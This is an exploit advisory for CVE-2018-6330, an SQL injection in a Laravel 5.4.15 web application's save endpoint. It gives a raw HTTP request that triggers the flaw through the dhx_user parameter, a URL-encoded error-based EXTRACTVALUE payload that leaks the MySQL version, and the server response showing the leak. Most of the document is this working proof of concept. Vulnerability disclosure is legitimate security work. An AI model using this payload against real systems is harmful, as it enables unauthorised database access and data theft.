#Exploit Title: Laravel SQLinjection 5.4.15

#Date: 26.01.2018

#Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQLinjection because it is not sanitized inside the save.php. The affected Parameters are dhx_user and dhx_version.

  • Proof of Concept

Login as user, then use the following request:

GET
/save?dhx_user=1516954053138’&dhx_version=1&swt_subdomain=center01
HTTP/1.1
Host:xxxxxx.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:58.0) Gecko/20100101 Firefox/58.0<
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: href=“https://xxxxxxx.net/agenda“>https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest

In your Response you will see a:

You have an Error in your Mysql Syntax.

To get the Database Version displayed you can send the following Payload:

dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%282263%2CCONCAT%280x5c%2C0x7171766b71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C21%29%29%2C0x7176787171%29%29–%20WWGj

The Response will look like this:

[…]

<span class=“exception_message“>PDO – sql execution failed<br />

XPATH syntax error: ‚\qqvkq5.7.18-1qvxqq'</span>

[…]